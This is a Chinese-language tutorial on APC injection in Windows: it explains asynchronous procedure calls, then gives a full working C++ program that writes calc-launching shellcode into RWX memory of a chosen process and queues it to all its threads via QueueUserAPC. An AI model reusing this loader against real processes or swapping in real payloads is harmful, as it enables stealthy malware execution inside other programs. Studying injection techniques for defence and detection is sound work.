# 16-APC注入（APC Injection） ## 一、前言 ### 1.1 APC（Asyncroneus Procedure Call）官方文档：[异步过程调用 - Win32 apps | Microsoft Learn](https://learn.microsoft.com/zh-cn/windows/win32/sync/asynchronous-procedure-calls) APC中文名称为异步过程调用， APC是一个链状的数据结构，可以让一个线程在其本应该的执行步骤前执行其他代码，每个线程都维护这一个APC链。当线程从等待状态苏醒后，会自动检测自己得APC队列中是否存在APC过程简单的说，由于在线程执行过程中，其他线程无法干预当前执行线程(占用cpu)，如果需要干预当前执行线程的操作，就需要提供一种让当前执行的线程自身去调用的机制，windows实现了一种称之为APC的技术，这种技术可以通过插入队列(执行信息)让当前执行的线程在一定条件下自己去调用，这样就实现了异步操作。 ### 1.2 线程的控制学习过操作系统的人都知道，在现代操作系统中，大部分都实现了内核级线程，因此线程是作为CPU调度的基本单位。线程在执行时是占据着 CPU 的资源，其他线程或进程不能直接“杀掉”或“挂起”它。虽然操作系统提供了一些 API 来控制线程的状态（如 `TerminateThread`、`SuspendThread` 和 `ResumeThread`），这些操作并不是直接通过线程本身的代码来实现的，而是通过操作系统的调度机制来管理。 ### 1.3 改变线程的行为一个线程如何改变当前CPU执行的线程的行为呢？Windows提供了一个API，让当前CPU执行的线程自己去调用,这个函数就是APC (Asyncroneus Procedure Call),即异步过程调用。APC 允许你将一个函数排队到某个线程的 APC 队列中，当该线程处于可执行状态时，操作系统会在适当的时机调用这个函数。 ## 二、APC注入 ### 2.1 原理既然Windows提供了这样的一种机制，那我们就可以往目标进程的线程的APC队列中插入APC函数（也称APC过程），当目标线程从等待状态苏醒后，首先检测自己的APC队列中是否存在APC过程，如果存在，就先执行APC过程然后再执行本身的执行流程。当然为了提高命中率可以向进程的所有线程中添加APC过程。然后促使线程从休眠中恢复就可以实现APC注入。 APC注入既可以实现shellcode注入，也可以实现DLL注入，本文只介绍shellcode注入；不仅能远程注入，也能本进程注入，本文只介绍远程注入。 ### 2.2 流程 1. 使用`OpenProcess`打开目标进程，获得其句柄 2. 使用 `VirtualAllocEx+WriteProcessMemory` 在远程进程中申请一块RWX内存区域，写入shellcode 3. 使用自定义函数 `GetAllThreadIdByProcessId` 根据目标PID获得其所有线程的TID（获取一个线程的TID也行，获得所有TID的目的是提高成功执行的几率） 4. 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务 ⚠注意：APC注入的的原始实现是“被动”执行APC函数，这里的“被动”是指需要目标的CPU执行我们注入的目标进程的线程，如果目标线程一直不被执行，那就不会触发我们的APC函数。 ### 2.3 代码实现 ```go #include #include #include #include // 获取指定进程 ID 的所有线程 ID std::vector GetAllThreadIdByProcessId(DWORD processId) { std::vector threadIds; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return threadIds; // 返回空列表 } THREADENTRY32 te; te.dwSize = sizeof(THREADENTRY32); // 遍历线程快照 if (Thread32First(hSnapshot, &te)) { do { if (te.th32OwnerProcessID == processId) { threadIds.push_back(te.th32ThreadID); } } while (Thread32Next(hSnapshot, &te)); } CloseHandle(hSnapshot); return threadIds; } int main() { // calc shellcode unsigned char shellcode[] = { 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3 }; LPVOID lpShellcode = NULL; HANDLE hProcess = NULL; //用户输入PID DWORD PID; std::cout << "请输入目标进程的PID："; std::cin >> PID; // 打开目标进程，获得其句柄 hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PID); // 在远程进程中申请一块RWX内存区域，写入shellcode lpShellcode = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, lpShellcode, shellcode, sizeof(shellcode), NULL); // 根据目标PID获得其所有线程的TID std::vector threadIds = GetAllThreadIdByProcessId(PID); for (DWORD threadId : threadIds) { HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, threadId); if (hThread != nullptr) { std::cout << "Opened thread ID: " << threadId << std::endl; // 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务 QueueUserAPC((PAPCFUNC)lpShellcode, hThread, NULL); CloseHandle(hThread); // 记得关闭句柄 } else { std::cerr << "Failed to open thread ID: " << threadId << std::endl; } } CloseHandle(hProcess); return 0; } ``` ![recording.gif](https://images-of-oneday.oss-cn-guangzhou.aliyuncs.com/images/2025/01/17/16-24-26-de48444e81b98ea0999193480238c766-recording-c40464.gif) ## 三、参考资料 1、 [APC注入以及几种实现方式 - 先知社区 (aliyun.com)](https://xz.aliyun.com/t/11153?time__1311=Cq0x2Dg70QdxlxGgOKDOQD8ReWeWTymhD) 2、 [总结加载Shellcode的各种方式 - 亨利其实很坏 - 博客园](https://www.cnblogs.com/henry666/p/17429771.html)